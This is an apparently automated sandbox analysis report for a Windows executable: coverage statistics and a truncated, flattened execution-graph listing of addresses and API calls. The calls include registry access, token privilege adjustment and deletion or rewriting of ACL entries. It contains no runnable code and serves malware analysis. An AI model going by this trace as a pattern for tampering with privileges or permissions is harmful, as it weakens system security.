                                                  • API String ID: 190613189-0
                                                  • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                  • Instruction ID: 8db07108f343804323cb09528c583574f267d9896fc780fa7d439bc94861dd43
                                                  • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                  • Instruction Fuzzy Hash: 1EF09631104519FFCB029FA5DE00D9EBBA8EF45350B2540B9F840F7250D678EE019BA9

                                                  Execution Graph

                                                  Execution Coverage:4.6%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:36%
                                                  Total number of Nodes:1763
                                                  Total number of Limit Nodes:58
                                                  execution_graph: node and edge listing of the rendered execution graph (graph layout not recoverable from the extraction; listing is truncated). Windows API calls named in the surviving nodes: AdjustTokenPrivileges, GetLastError, CloseHandle, ConvertStringSidToSidW, IsValidSid, GetLengthSid, CopySid, LocalFree, DsGetDcNameW, NetApiBufferFree.
RegEnumKeyExW 41315->41322 41316->41155 41324 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41317->41324 41318 7ff7c172ab79 41320 7ff7c1713f80 35 API calls 41318->41320 41319 7ff7c172ab9b 41321 7ff7c1740c18 13 API calls 41319->41321 41323 7ff7c172ab8f Concurrency::details::SchedulerBase::GetBitSet SimpleUString::operator= 41320->41323 41373 7ff7c172aba2 41321->41373 41347 7ff7c172b81f Concurrency::details::platform::DefaultWaiterPool::get_waiter 41322->41347 41344 7ff7c172b4a0 41323->41344 41323->41412 41903 7ff7c1709d90 35 API calls 41323->41903 41325 7ff7c172bc32 41324->41325 41330 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41325->41330 41326 7ff7c172b920 41328 7ff7c172b9df 41326->41328 41329 7ff7c172b930 41326->41329 41327 7ff7c172a960 41333 7ff7c1740c18 13 API calls 41327->41333 41327->41368 41332 7ff7c172b9eb RegCloseKey 41328->41332 41378 7ff7c172b9f1 Concurrency::details::platform::DefaultWaiterPool::get_waiter 41328->41378 41334 7ff7c172b93c 41329->41334 41335 7ff7c172b935 RegCloseKey 41329->41335 41336 7ff7c172bc38 41330->41336 41332->41378 41386 7ff7c172a9c5 41333->41386 41340 7ff7c172b971 Concurrency::details::platform::DefaultWaiterPool::get_waiter 41334->41340 41350 7ff7c172bc21 41334->41350 41335->41334 41985 7ff7c1713e30 33 API calls 41336->41985 41337 7ff7c1713f80 35 API calls 41337->41347 41338 7ff7c172b488 41904 7ff7c1709420 31 API calls 2 library calls 41338->41904 41339 7ff7c172bb05 41341 7ff7c172bb3c Concurrency::details::platform::DefaultWaiterPool::get_waiter 41339->41341 41339->41350 41919 7ff7c1709720 31 API calls 2 library calls 41340->41919 41983 7ff7c1709720 31 API calls 2 library calls 41341->41983 41365 7ff7c172b4eb 41344->41365 41906 7ff7c1709cb0 35 API calls 41344->41906 41347->41317 41347->41326 41347->41337 41358 7ff7c172b8e6 RegEnumKeyExW 41347->41358 41918 7ff7c1710360 35 API calls 3 library calls 41347->41918 41348 7ff7c172b497 41905 7ff7c1714230 31 API calls 2 library calls 41348->41905 41349 
7ff7c170c870 69 API calls 41349->41355 41356 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41350->41356 41355->41327 41355->41349 41356->41311 41357 7ff7c172b986 41357->41311 41362 7ff7c172b9be Concurrency::details::platform::DefaultWaiterPool::get_waiter 41357->41362 41358->41347 41360 7ff7c172ac60 41364 7ff7c1740c18 13 API calls 41360->41364 41382 7ff7c172aea7 41360->41382 41361 7ff7c170c870 69 API calls 41361->41373 41362->41312 41363 7ff7c172b4d5 41907 7ff7c1714230 31 API calls 2 library calls 41363->41907 41395 7ff7c172acc5 41364->41395 41366 7ff7c172b54c 41365->41366 41369 7ff7c172b526 RegConnectRegistryW 41365->41369 41365->41412 41374 7ff7c172b55f RegOpenKeyExW 41366->41374 41368->41318 41368->41319 41369->41366 41369->41412 41371 7ff7c170c870 69 API calls 41371->41386 41373->41360 41373->41361 41377 7ff7c172b58b 41374->41377 41375 7ff7c172af99 41379 7ff7c1713f80 35 API calls 41375->41379 41376 7ff7c172afbb 41380 7ff7c1740c18 13 API calls 41376->41380 41381 7ff7c172b676 41377->41381 41384 7ff7c172b5a7 RegCreateKeyExW 41377->41384 41378->41325 41378->41336 41378->41339 41920 7ff7c170aa20 41378->41920 41931 7ff7c170ac70 41378->41931 41936 7ff7c172b710 41378->41936 41379->41323 41397 7ff7c172afc2 41380->41397 41383 7ff7c172b68e RegCloseKey 41381->41383 41381->41412 41382->41375 41382->41376 41383->41412 41388 7ff7c172b652 41384->41388 41389 7ff7c172b5e6 41384->41389 41385 7ff7c172ad80 41385->41382 41390 7ff7c1740c18 13 API calls 41385->41390 41386->41368 41386->41371 41387 7ff7c170c870 69 API calls 41387->41395 41388->41381 41392 7ff7c172b65f RegCloseKey 41388->41392 41908 7ff7c1709cb0 35 API calls 41389->41908 41393 7ff7c172ade5 41390->41393 41392->41381 41393->41382 41403 7ff7c170c870 69 API calls 41393->41403 41394 7ff7c172b5f9 41909 7ff7c1709d20 35 API calls 41394->41909 41395->41385 41395->41387 41404 7ff7c170c870 69 API calls 41397->41404 41417 7ff7c172b080 41397->41417 41398 7ff7c172b60d 41910 7ff7c17094c0 35 API calls 41398->41910 41400 
7ff7c1740c18 13 API calls 41422 7ff7c172b0e5 41400->41422 41401 7ff7c172b620 41911 7ff7c1714230 31 API calls 2 library calls 41401->41911 41403->41393 41404->41397 41405 7ff7c172b637 41912 7ff7c1714230 31 API calls 2 library calls 41405->41912 41407 7ff7c1740c18 13 API calls 41409 7ff7c172b386 41407->41409 41408 7ff7c172b641 41913 7ff7c1714230 31 API calls 2 library calls 41408->41913 41900 7ff7c1709b00 69 API calls 41409->41900 41914 7ff7c1714230 31 API calls 2 library calls 41412->41914 41413 7ff7c172b3aa 41413->41323 41415 7ff7c1740c18 13 API calls 41413->41415 41414 7ff7c172b1a0 41416 7ff7c1740c18 13 API calls 41414->41416 41426 7ff7c172b2c0 Concurrency::details::SchedulerBase::GetBitSet 41414->41426 41418 7ff7c172b3b5 41415->41418 41428 7ff7c172b205 41416->41428 41417->41400 41417->41426 41901 7ff7c1709b00 69 API calls 41418->41901 41420 7ff7c172b3d9 41420->41323 41423 7ff7c1740c18 13 API calls 41420->41423 41421 7ff7c170c870 69 API calls 41421->41422 41422->41414 41422->41421 41424 7ff7c172b3e4 41423->41424 41902 7ff7c1709b00 69 API calls 41424->41902 41426->41323 41426->41407 41427 7ff7c170c870 69 API calls 41427->41428 41428->41426 41428->41427 41431 7ff7c1742189 41430->41431 41432 7ff7c17243c0 41431->41432 41433 7ff7c1742b14 IsProcessorFeaturePresent 41431->41433 41434 7ff7c1742b2c 41433->41434 42064 7ff7c1742d08 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 41434->42064 41436 7ff7c1742b3f 42065 7ff7c1742ae0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 41436->42065 42066 7ff7c174882c 31 API calls 2 library calls 41439->42066 41441 7ff7c1748915 42067 7ff7c174892c IsProcessorFeaturePresent 41441->42067 41445 7ff7c1740c18 13 API calls 41444->41445 41446 7ff7c173f9e9 41445->41446 41448 7ff7c170c870 69 API calls 41446->41448 41449 7ff7c173faa2 41446->41449 41447 7ff7c1740c18 13 API calls 41451 7ff7c173fb3b 41447->41451 41448->41446 41449->41447 41472 7ff7c173e706 41449->41472 41450 7ff7c170c870 69 API calls 
41450->41451 41451->41450 41453 7ff7c173fbf0 41451->41453 41452 7ff7c1740c18 13 API calls 41455 7ff7c173fc89 41452->41455 41453->41452 41453->41472 41454 7ff7c170c870 69 API calls 41454->41455 41455->41454 41457 7ff7c173fd40 41455->41457 41456 7ff7c1740c18 13 API calls 41458 7ff7c173fdd9 41456->41458 41457->41456 41457->41472 41460 7ff7c170c870 69 API calls 41458->41460 41461 7ff7c173fe90 41458->41461 41459 7ff7c1740c18 13 API calls 41462 7ff7c173ff29 41459->41462 41460->41458 41461->41459 41461->41472 41464 7ff7c170c870 69 API calls 41462->41464 41465 7ff7c173ffe0 41462->41465 41463 7ff7c1740c18 13 API calls 41466 7ff7c1740079 41463->41466 41464->41462 41465->41463 41465->41472 41468 7ff7c170c870 69 API calls 41466->41468 41469 7ff7c1740130 41466->41469 41467 7ff7c1740c18 13 API calls 41471 7ff7c17401c9 41467->41471 41468->41466 41469->41467 41469->41472 41470 7ff7c170c870 69 API calls 41470->41471 41471->41470 41471->41472 41472->41192 41474 7ff7c1713f80 35 API calls 41473->41474 41475 7ff7c1714791 41474->41475 41535 7ff7c174e3a4 41475->41535 41478 7ff7c1713f80 35 API calls 41479 7ff7c17147e3 ctype 41478->41479 41479->41197 41481 7ff7c173f3ea LookupAccountNameW GetLastError 41480->41481 41483 7ff7c173f469 41481->41483 41484 7ff7c173f45e GetLastError 41481->41484 41485 7ff7c173f4a4 memcpy_s 41483->41485 41487 7ff7c173f4bb 41483->41487 41489 7ff7c173f492 41483->41489 41500 7ff7c173f61f Concurrency::details::platform::DefaultWaiterPool::get_waiter 41484->41500 41498 7ff7c173f5f0 Concurrency::details::platform::DefaultWaiterPool::get_waiter 41485->41498 41566 7ff7c1715790 35 API calls 3 library calls 41485->41566 41488 7ff7c17421d4 std::_Facet_Register 5 API calls 41487->41488 41488->41485 41490 7ff7c173f653 Concurrency::cancel_current_task 41489->41490 41560 7ff7c17421d4 41489->41560 41492 7ff7c173f4f7 LookupAccountNameW 41494 7ff7c173f557 GetLastError 41492->41494 41495 7ff7c173f561 41492->41495 41501 7ff7c173f5b7 41494->41501 41499 7ff7c1713f80 35 API calls 
41495->41499 41496 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41497 7ff7c173f652 41496->41497 41497->41490 41498->41496 41498->41500 41502 7ff7c173f586 41499->41502 41500->41224 41501->41498 41503 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41501->41503 41502->41501 41504 7ff7c173f590 IsValidSid 41502->41504 41503->41498 41504->41501 41505 7ff7c173f59d ctype 41504->41505 41567 7ff7c173ec20 IsValidSid GetLengthSid CopySid ctype 41505->41567 41507->41187 41570 7ff7c174125c 41508->41570 41510 7ff7c1740c3a 41512 7ff7c1740c5d ctype 41510->41512 41578 7ff7c1740e14 5 API calls std::_Facet_Register 41510->41578 41574 7ff7c17412d4 41512->41574 41513 7ff7c1740c52 41579 7ff7c1740e44 EncodePointer std::locale::_Setgloballocale 41513->41579 41516 7ff7c173e7b9 41517 7ff7c1715cf0 69 API calls 41516->41517 41517->41215 41521 7ff7c170954d 41518->41521 41519 7ff7c170955b ctype 41519->41220 41520 7ff7c170960c Concurrency::cancel_current_task 41581 7ff7c1708e00 31 API calls 2 library calls 41520->41581 41521->41519 41521->41520 41523 7ff7c170959f 41521->41523 41524 7ff7c17095c6 41521->41524 41523->41520 41525 7ff7c17421d4 std::_Facet_Register 5 API calls 41523->41525 41524->41519 41526 7ff7c17421d4 std::_Facet_Register 5 API calls 41524->41526 41528 7ff7c17095b0 41525->41528 41526->41519 41527 7ff7c1709634 Concurrency::details::platform::DefaultWaiterPool::get_waiter 41527->41220 41528->41519 41529 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41528->41529 41530 7ff7c170960b 41529->41530 41530->41520 41531->41244 41582 7ff7c1741034 33 API calls Concurrency::cancel_current_task 41532->41582 41538 7ff7c174e218 41535->41538 41559 7ff7c174f264 EnterCriticalSection 41538->41559 41540 7ff7c174e244 41541 7ff7c174e24c 41540->41541 41544 7ff7c174e26f 41540->41544 41542 7ff7c174e1f8 _Wcrtomb 14 API calls 41541->41542 41543 7ff7c174e251 41542->41543 41546 7ff7c17488dc _invalid_parameter_noinfo 31 API calls 41543->41546 41545 7ff7c174e30c 39 API 
calls 41544->41545 41549 7ff7c174e277 41545->41549 41554 7ff7c174e25d 41546->41554 41547 7ff7c174f2b8 std::_Locinfo::_Locinfo_ctor LeaveCriticalSection 41548 7ff7c17147b7 41547->41548 41548->41478 41548->41479 41550 7ff7c174e2b4 41549->41550 41551 7ff7c174e2a4 41549->41551 41549->41554 41553 7ff7c1755174 _Getctype 31 API calls 41550->41553 41552 7ff7c174e1f8 _Wcrtomb 14 API calls 41551->41552 41552->41554 41555 7ff7c174e2c2 41553->41555 41554->41547 41555->41554 41556 7ff7c174e2f5 41555->41556 41557 7ff7c174892c _invalid_parameter_noinfo_noreturn 17 API calls 41556->41557 41558 7ff7c174e309 41557->41558 41564 7ff7c17421df 41560->41564 41561 7ff7c17421f8 41561->41485 41563 7ff7c174220a Concurrency::cancel_current_task 41563->41564 41564->41560 41564->41561 41564->41563 41568 7ff7c17524d0 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 41564->41568 41569 7ff7c1740ff0 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 41564->41569 41566->41492 41567->41501 41568->41564 41571 7ff7c174126b 41570->41571 41572 7ff7c1741270 41570->41572 41580 7ff7c174f2d4 6 API calls std::_Lockit::_Lockit 41571->41580 41572->41510 41575 7ff7c17412e8 41574->41575 41576 7ff7c17412df LeaveCriticalSection 41574->41576 41575->41516 41578->41513 41579->41512 41581->41527 41585 7ff7c171c48e ctype 41584->41585 41986 7ff7c171c5b0 41585->41986 41587 7ff7c171c519 Concurrency::details::platform::DefaultWaiterPool::get_waiter ctype 41588 7ff7c1742180 _handle_error 8 API calls 41587->41588 41589 7ff7c171c594 41588->41589 41589->41264 41591 7ff7c17344ff 41590->41591 41592 7ff7c170c870 69 API calls 41591->41592 41593 7ff7c172a45d 41591->41593 41592->41591 41593->41268 41593->41269 41595 7ff7c172bd59 41594->41595 41596 7ff7c172bd43 IsValidSid 41594->41596 41599 7ff7c172bd7c IsValidSid 41595->41599 41600 7ff7c172bd92 41595->41600 41596->41595 41597 7ff7c172bd4d 41596->41597 42010 7ff7c173ec20 IsValidSid GetLengthSid CopySid ctype 41597->42010 41599->41600 41601 7ff7c172bd86 
41599->41601 41603 7ff7c1709520 35 API calls 41600->41603 41656 7ff7c172c031 Concurrency::details::platform::DefaultWaiterPool::get_waiter 41600->41656 42011 7ff7c173ec20 IsValidSid GetLengthSid CopySid ctype 41601->42011 41605 7ff7c172bdbf 41603->41605 41604 7ff7c1709520 35 API calls 41606 7ff7c172c0e9 41604->41606 41608 7ff7c1709520 35 API calls 41605->41608 41990 7ff7c1724440 41606->41990 41609 7ff7c172bdd3 41608->41609 41613 7ff7c171c460 8 API calls 41609->41613 41610 7ff7c172e472 42049 7ff7c1713e30 33 API calls 41610->42049 41611 7ff7c172e45a 42048 7ff7c1713e30 33 API calls 41611->42048 41618 7ff7c172be2b 41613->41618 41616 7ff7c170aa20 35 API calls 41621 7ff7c172c36f 41616->41621 41617 7ff7c172e478 41624 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41617->41624 41629 7ff7c171c460 8 API calls 41618->41629 41619 7ff7c170aa20 35 API calls 41622 7ff7c172c14b 41619->41622 41620 7ff7c172e460 41626 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41620->41626 41623 7ff7c170ac70 35 API calls 41621->41623 41625 7ff7c170ac70 35 API calls 41622->41625 41627 7ff7c172c38b 41623->41627 41628 7ff7c172e47e 41624->41628 41630 7ff7c172c165 41625->41630 41631 7ff7c172e466 41626->41631 41632 7ff7c1713f80 35 API calls 41627->41632 41635 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41628->41635 41633 7ff7c172be7a 41629->41633 41634 7ff7c1713f80 35 API calls 41630->41634 41637 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41631->41637 41669 7ff7c172c3eb Concurrency::details::platform::DefaultWaiterPool::get_waiter 41632->41669 41636 7ff7c1740c18 13 API calls 41633->41636 41647 7ff7c172c1c2 Concurrency::details::platform::DefaultWaiterPool::get_waiter ctype 41634->41647 41638 7ff7c172e484 41635->41638 41639 7ff7c172be84 41636->41639 41640 7ff7c172e46c 41637->41640 41642 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41638->41642 42012 7ff7c1715cf0 69 API calls 41639->42012 41641 7ff7c17488fc 
_invalid_parameter_noinfo_noreturn 31 API calls 41640->41641 41641->41610 41643 7ff7c172e48a 41642->41643 42050 7ff7c1713e30 33 API calls 41643->42050 41646 7ff7c172e490 41649 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41646->41649 41647->41620 41647->41631 41647->41640 42015 7ff7c1736970 33 API calls 4 library calls 41647->42015 41652 7ff7c172e496 41649->41652 41650 7ff7c172c2de 42016 7ff7c1736970 33 API calls 4 library calls 41650->42016 41651 7ff7c172beb8 41651->41656 41662 7ff7c172beeb Concurrency::details::platform::DefaultWaiterPool::get_waiter ctype 41651->41662 41657 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41652->41657 41654 7ff7c172c2e8 41654->41610 41654->41616 41780 7ff7c172c00f Concurrency::details::platform::DefaultWaiterPool::get_waiter 41654->41780 41899 7ff7c172e424 41654->41899 41655 7ff7c172e44e 41659 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41655->41659 41656->41604 41656->41655 41658 7ff7c172e454 41656->41658 41660 7ff7c172e49c 41657->41660 41661 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41658->41661 41659->41658 41666 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41660->41666 41661->41611 41662->41655 41662->41658 42013 7ff7c1736970 33 API calls 4 library calls 41662->42013 41663 7ff7c1742180 _handle_error 8 API calls 41665 7ff7c172b779 41663->41665 41665->41302 41665->41306 41671 7ff7c172e4a2 41666->41671 41667 7ff7c172bfcc 42014 7ff7c1736970 33 API calls 4 library calls 41667->42014 41668 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41673 7ff7c172e42a 41668->41673 41669->41617 41669->41628 41669->41638 41670 7ff7c1709520 35 API calls 41669->41670 41674 7ff7c172c803 41670->41674 41676 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41671->41676 41677 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41673->41677 41680 7ff7c172cd69 41674->41680 41681 7ff7c172c83b 41674->41681 41675 7ff7c172bfd6 41682 7ff7c172e448 
41675->41682 41675->41780 41679 7ff7c172e4a8 41676->41679 41678 7ff7c172e430 41677->41678 41683 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41678->41683 41687 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41679->41687 41690 7ff7c1709520 35 API calls 41680->41690 41783 7ff7c172cdc2 Concurrency::details::platform::DefaultWaiterPool::get_waiter ctype 41680->41783 41685 7ff7c172cadc 41681->41685 41686 7ff7c172c84f 41681->41686 41684 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41682->41684 41688 7ff7c172e436 41683->41688 41684->41655 42019 7ff7c171bf60 45 API calls 4 library calls 41685->42019 42017 7ff7c171bf60 45 API calls 4 library calls 41686->42017 41692 7ff7c172e4ae 41687->41692 41700 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41688->41700 41696 7ff7c172cda9 41690->41696 42051 7ff7c1713e30 33 API calls 41692->42051 41693 7ff7c172c854 41693->41643 41709 7ff7c170aa20 35 API calls 41693->41709 41694 7ff7c172d0de 41705 7ff7c172d1a2 41694->41705 41706 7ff7c172d110 GetAclInformation 41694->41706 41786 7ff7c172d272 41694->41786 41695 7ff7c172cae1 41695->41692 41710 7ff7c170aa20 35 API calls 41695->41710 42021 7ff7c17150c0 72 API calls 3 library calls 41696->42021 41698 7ff7c172cf6c GetAclInformation 41702 7ff7c172cf8b GetLastError 41698->41702 41723 7ff7c172cf9f 41698->41723 41699 7ff7c172ce3c 41699->41694 41720 7ff7c172d02b GetAclInformation 41699->41720 41704 7ff7c172e43c 41700->41704 41708 7ff7c172e354 LocalFree LocalFree 41702->41708 41703 7ff7c172e4b4 41714 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41703->41714 41718 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41704->41718 41719 7ff7c172d1d3 GetAclInformation 41705->41719 41705->41786 41712 7ff7c172d12c GetLastError 41706->41712 41734 7ff7c172d140 41706->41734 41707 7ff7c172cdba 41716 7ff7c1709520 35 API calls 41707->41716 41707->41783 41726 7ff7c172e377 ctype 41708->41726 41715 7ff7c172c8a6 41709->41715 41721 
7ff7c172cb33 41710->41721 41711 7ff7c172d2b8 GetAclInformation 41722 7ff7c172d2d7 GetLastError 41711->41722 41754 7ff7c172d2eb 41711->41754 41712->41708 41713 7ff7c172cfc0 GetAce 41713->41702 41713->41723 41724 7ff7c172e4ba 41714->41724 41725 7ff7c170ac70 35 API calls 41715->41725 41716->41783 41717 7ff7c172d38a GetAclInformation 41727 7ff7c172d3a8 GetLastError 41717->41727 41758 7ff7c172d3bc 41717->41758 41728 7ff7c172e442 41718->41728 41729 7ff7c172d1ef GetLastError 41719->41729 41785 7ff7c172d203 41719->41785 41730 7ff7c172d047 GetLastError 41720->41730 41787 7ff7c172d06f 41720->41787 41731 7ff7c170ac70 35 API calls 41721->41731 41722->41708 41723->41699 41723->41713 41735 7ff7c172cfdf DeleteAce 41723->41735 41744 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41724->41744 41736 7ff7c172c8c0 41725->41736 42046 7ff7c1736970 33 API calls 4 library calls 41726->42046 41727->41708 41746 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41728->41746 41729->41708 41730->41708 41738 7ff7c172cb4d 41731->41738 41732 7ff7c172d44c 41740 7ff7c172d47e 41732->41740 41800 7ff7c172c937 Concurrency::details::platform::DefaultWaiterPool::get_waiter ctype 41732->41800 42025 7ff7c1739d50 69 API calls 4 library calls 41732->42025 41733 7ff7c172d160 GetAce 41733->41702 41733->41734 41734->41705 41734->41733 41742 7ff7c172d183 DeleteAce 41734->41742 41735->41723 41743 7ff7c172d05b GetLastError 41735->41743 42018 7ff7c171a1f0 33 API calls 41736->42018 42020 7ff7c171a1f0 33 API calls 41738->42020 41739 7ff7c172d382 41739->41732 42024 7ff7c1739d50 69 API calls 4 library calls 41739->42024 41753 7ff7c172d59d ctype 41740->41753 41761 7ff7c172d4b2 41740->41761 41740->41800 42026 7ff7c1739830 50 API calls 2 library calls 41740->42026 41741 7ff7c172d300 GetAce 41741->41702 41741->41754 41742->41734 41742->41743 41743->41708 41755 7ff7c172e4c0 41744->41755 41746->41682 41747 7ff7c172e397 42047 7ff7c1736970 33 API calls 4 library calls 41747->42047 41748 7ff7c172d3d0 
GetAce 41748->41702 41748->41758 41749 7ff7c172d220 GetAce 41749->41702 41749->41785 41750 7ff7c172d090 GetAce 41750->41702 41750->41787 41765 7ff7c172d5f7 41753->41765 41794 7ff7c172d7ac ctype 41753->41794 42031 7ff7c1738360 155 API calls 4 library calls 41753->42031 41754->41741 41762 7ff7c172d32b DeleteAce 41754->41762 41764 7ff7c172d2ae 41754->41764 41774 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41755->41774 41758->41739 41758->41748 41768 7ff7c172d3fb DeleteAce 41758->41768 41761->41753 41772 7ff7c172d4e3 41761->41772 41761->41800 42027 7ff7c1739830 50 API calls 2 library calls 41761->42027 41762->41743 41762->41754 41764->41717 41764->41739 41765->41794 41765->41800 41826 7ff7c172d628 41765->41826 42032 7ff7c1738360 155 API calls 4 library calls 41765->42032 41767 7ff7c172e3a1 41767->41728 41767->41780 41768->41743 41768->41758 41772->41753 41772->41800 42028 7ff7c1739b10 13 API calls ctype 41772->42028 41777 7ff7c172e4c6 41774->41777 41775 7ff7c172d942 SetEntriesInAclW 41778 7ff7c172dc10 SetEntriesInAclW 41775->41778 41779 7ff7c172d964 41775->41779 41793 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41777->41793 41788 7ff7c172dee2 41778->41788 41789 7ff7c172dc36 41778->41789 41779->41800 42035 7ff7c171bf60 45 API calls 4 library calls 41779->42035 41780->41663 41781 7ff7c172d253 DeleteAce 41781->41743 41781->41785 41782 7ff7c172d0c3 DeleteAce 41782->41743 41782->41787 41783->41673 41783->41694 41783->41698 41783->41699 41785->41749 41785->41781 41785->41786 42023 7ff7c17339c0 13 API calls _handle_error 41785->42023 41786->41711 41786->41764 41787->41694 41787->41750 41787->41782 42022 7ff7c17339c0 13 API calls _handle_error 41787->42022 41790 7ff7c172def1 41788->41790 41791 7ff7c172dfa4 41788->41791 41789->41800 42037 7ff7c171bf60 45 API calls 4 library calls 41789->42037 41796 7ff7c172df1a 41790->41796 41797 7ff7c172df05 IsValidSid 41790->41797 41805 7ff7c172dfd8 41791->41805 41806 7ff7c172dfc3 IsValidSid 41791->41806 
41857 7ff7c172df9f 41791->41857 41799 7ff7c172e4cc 41793->41799 41794->41775 41794->41800 41810 7ff7c172df4b 41796->41810 41811 7ff7c172df36 IsValidSid 41796->41811 41797->41796 41804 7ff7c172df12 41797->41804 41798 7ff7c172d527 41798->41800 41818 7ff7c172d541 IsValidSid 41798->41818 41833 7ff7c172d554 ctype 41798->41833 41812 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41799->41812 41800->41646 41800->41652 41800->41660 41800->41671 41800->41679 41800->41703 41800->41708 41800->41724 41800->41755 41800->41777 41800->41799 41801 7ff7c172d739 41816 7ff7c172d74c IsValidSid 41801->41816 41817 7ff7c172d75f ctype 41801->41817 41802 7ff7c172d97e 41808 7ff7c172e4d2 41802->41808 41827 7ff7c170aa20 35 API calls 41802->41827 42039 7ff7c173ec20 IsValidSid GetLengthSid CopySid ctype 41804->42039 41823 7ff7c172e009 41805->41823 41824 7ff7c172dff4 IsValidSid 41805->41824 41806->41805 41814 7ff7c172dfd0 41806->41814 41807 7ff7c172dc50 41815 7ff7c172e4f0 41807->41815 41835 7ff7c170aa20 35 API calls 41807->41835 42052 7ff7c1713e30 33 API calls 41808->42052 41834 7ff7c1709520 35 API calls 41810->41834 41811->41810 41819 7ff7c172df43 41811->41819 41812->41808 42042 7ff7c173ec20 IsValidSid GetLengthSid CopySid ctype 41814->42042 42053 7ff7c1713e30 33 API calls 41815->42053 41816->41817 41828 7ff7c172d756 41816->41828 41817->41794 41830 7ff7c172d799 IsValidSid 41817->41830 41831 7ff7c172d54b 41818->41831 41818->41833 42040 7ff7c173ec20 IsValidSid GetLengthSid CopySid ctype 41819->42040 41848 7ff7c1709520 35 API calls 41823->41848 41824->41823 41837 7ff7c172e001 41824->41837 41826->41794 41826->41800 41826->41801 41839 7ff7c1739200 117 API calls 41826->41839 41840 7ff7c172d9d2 41827->41840 42033 7ff7c173ec20 IsValidSid GetLengthSid CopySid ctype 41828->42033 41830->41794 41841 7ff7c172d7a3 41830->41841 42029 7ff7c173ec20 IsValidSid GetLengthSid CopySid ctype 41831->42029 41833->41753 41845 7ff7c172d58a IsValidSid 41833->41845 41844 7ff7c172df74 41834->41844 41846 
7ff7c172dca4 41835->41846 42043 7ff7c173ec20 IsValidSid GetLengthSid CopySid ctype 41837->42043 41838 7ff7c172e09e 41849 7ff7c172e50e 41838->41849 41864 7ff7c170aa20 35 API calls 41838->41864 41839->41826 41850 7ff7c170ac70 35 API calls 41840->41850 42034 7ff7c173ec20 IsValidSid GetLengthSid CopySid ctype 41841->42034 42041 7ff7c1738010 42 API calls 4 library calls 41844->42041 41845->41753 41854 7ff7c172d594 41845->41854 41855 7ff7c170ac70 35 API calls 41846->41855 41848->41857 42054 7ff7c1713e30 33 API calls 41849->42054 41859 7ff7c172d9ea 41850->41859 42030 7ff7c173ec20 IsValidSid GetLengthSid CopySid ctype 41854->42030 41861 7ff7c172dcbc 41855->41861 41857->41800 42044 7ff7c171bf60 45 API calls 4 library calls 41857->42044 42036 7ff7c171a1f0 33 API calls 41859->42036 42038 7ff7c171a1f0 33 API calls 41861->42038 41868 7ff7c172e0f0 41864->41868 41874 7ff7c170ac70 35 API calls 41868->41874 41879 7ff7c172e10a 41874->41879 42045 7ff7c171a1f0 33 API calls 41879->42045 41899->41668 41900->41413 41901->41420 41902->41323 41903->41338 41904->41348 41905->41344 41906->41363 41907->41365 41908->41394 41909->41398 41910->41401 41911->41405 41912->41408 41913->41412 41914->41278 41915->41285 41916->41292 41917->41297 41918->41347 41919->41357 41921 7ff7c170aa72 41920->41921 41924 7ff7c170aad9 ctype 41920->41924 41922 7ff7c170aa87 41921->41922 41923 7ff7c170ab53 Concurrency::cancel_current_task 41921->41923 41925 7ff7c170aae7 41921->41925 41922->41923 41926 7ff7c17421d4 std::_Facet_Register 5 API calls 41922->41926 41924->41378 41925->41924 41928 7ff7c17421d4 std::_Facet_Register 5 API calls 41925->41928 41927 7ff7c170aad4 41926->41927 41927->41924 41929 7ff7c17488fc _invalid_parameter_noinfo_noreturn 31 API calls 41927->41929 41928->41924 41930 7ff7c170ab52 41929->41930 41930->41923 41932 7ff7c170accf 41931->41932 41935 7ff7c170ac8c ctype 41931->41935 42058 7ff7c170bff0 35 API calls 4 library calls 41932->42058 41934 7ff7c170ace2 41934->41378 41935->41378 41937 7ff7c1709520 
[Execution graph: raw node/edge dump of the sample's call graph; the rendered graph is not preserved. Each node is a function-start address in the 7ff7c17xxxxx image range followed by the API calls and library symbols resolved at that node, and each "a->b" entry is a call edge between node ids. The dump is cut off mid-graph.]
Windows API calls visible in this part of the graph, grouped by what they touch:
Registry enumeration: RegEnumKeyExW, RegCloseKey
Token and privilege handling: GetCurrentProcess, OpenProcessToken, AdjustTokenPrivileges, GetLastError, CloseHandle, FindCloseChangeNotification
